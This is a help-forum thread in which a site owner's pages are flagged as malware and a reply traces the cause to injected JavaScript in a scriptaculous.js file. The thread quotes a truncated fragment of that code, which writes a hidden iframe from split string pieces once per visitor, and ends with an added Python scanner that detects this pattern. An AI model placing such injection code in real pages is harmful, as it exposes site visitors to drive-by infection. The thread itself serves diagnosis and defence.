6/20/09
Original Poster
yashvin

yashvinawootar.com has been marked as malware

Hello everyone.
 
I have a personal web site which has been running without any modifications for months. However, suddenly, the site has been marked as malware. I have checked all the code, and even the FTP dates show that no modifications have been made for months.
 
I read the guidelines, and I can see that redirects are sometimes considered as malware.
I have an old domain which redirects to my new site http://www.yashvinawootar.com which itself redirects to a sub folder on which my site lies.
 
Do those redirects have something to do with it? I have submitted review requests, but I still have the same problem.
Thanks in advance,
 
Cheers from Mauritius.
Yashvin
All Replies (5)
Denis
6/20/09
Hi,

Check the "/mypages/js/scriptaculous.js?load=effects" script file. At the bottom, you will find a piece of malicious code that injects a hidden iframe from "gcounter cn"

Here are the malicious strings
---------------
if (document.cookie.search("coqwg=3") == -1) {
document.write("<i"+"fr"+"ame sr"+"c=http:"+"//"+"gcou"+"nter"+......
document.cookie = "coqwg=3;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}

---------------

6/20/09
Original Poster
yashvin
Hi Denis.
 
Thanks for your reply, but is this the source?
I mean, I have not modified the file in any way for months.
 
Anyway, I have commented the code.
Let's hope it works, I will be requesting another review from Google.
 
Thanks again!
Denis
6/20/09
http://www.google.com/safebrowsing/diagnostic?site=yashvinawootar.com
Google says that the problem is in "gcounter cn". So yes, this is the source.

6/20/09
Original Poster
yashvin
Yes, let's hope there aren't any other such scripts hidden somewhere.
 
You have really fascinated me.
As a young software engineer, I would be grateful to you if you can tell me how you scanned the content to find that code hidden and broken down into pieces?
That would really interest me!
Denis
6/21/09
I used the NoScript Firefox extension, which warned me about an external script from gcounter. The rest was a matter of scanning all the files that the page loaded.

Note, I did this on a Linux machine to minimize risk of being infected.
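One way to automate the manual file review described in this thread, as an added example that is not part of the original posts: a small Python scanner that joins string literals split with `+` and reports any line that builds an `<iframe>` or `<script>` tag with a `src`, marking the ones that only become visible after joining. The sample input is constructed, `example.invalid` is a placeholder host, and `scan_js` and the regex names are chosen here.

```python
import re

# Adjacent string literals glued with "+":  "<i"+"fr"+"ame"  ->  "<iframe"
_CONCAT = re.compile(r"""["']\s*\+\s*["']""")
# A tag that makes the browser fetch something from elsewhere.
_TAG = re.compile(r"<\s*(iframe|script)\b[^>]*?\bsrc\s*=", re.I)
# Host part of an absolute or protocol-relative src value.
_HOST = re.compile(r"""\bsrc\s*=\s*["']?(?:https?:)?//([^/\s"'>]+)""", re.I)

def scan_js(text):
    """Return one finding per line that writes an iframe/script tag.

    'split' is True when the tag is invisible in the raw line and only
    appears once the "+"-joined string pieces are merged, which is the
    pattern seen in the injected code quoted in the thread.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        joined = _CONCAT.sub("", line)
        tag = _TAG.search(joined)
        if not tag:
            continue
        host = _HOST.search(joined)
        findings.append({
            "line": lineno,
            "tag": tag.group(1).lower(),
            "split": _TAG.search(line) is None,
            "host": host.group(1) if host else None,
        })
    return findings

# Constructed sample: line 1 is an ordinary loader-style write, line 3 is
# modelled on the split-string iframe injection (placeholder host).
SAMPLE = r"""document.write('<script type="text/javascript" src="'+lib+'"><\/script>');
if (document.cookie.search("seen=1") == -1) {
document.write("<i"+"fr"+"ame sr"+"c=http:"+"//"+"exam"+"ple.inv"+"alid/></i"+"frame>");
document.cookie = "seen=1;path=/";}
"""

if __name__ == "__main__":
    for f in scan_js(SAMPLE):
        note = "SPLIT-STRING TAG" if f["split"] else "plain tag, review"
        print(f"line {f['line']}: <{f['tag']}> host={f['host']} [{note}]")
```

Run it over every script file the page loads; a `split` finding with an unfamiliar host is the one to investigate first, while plain findings are usually the library's own loader code.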
 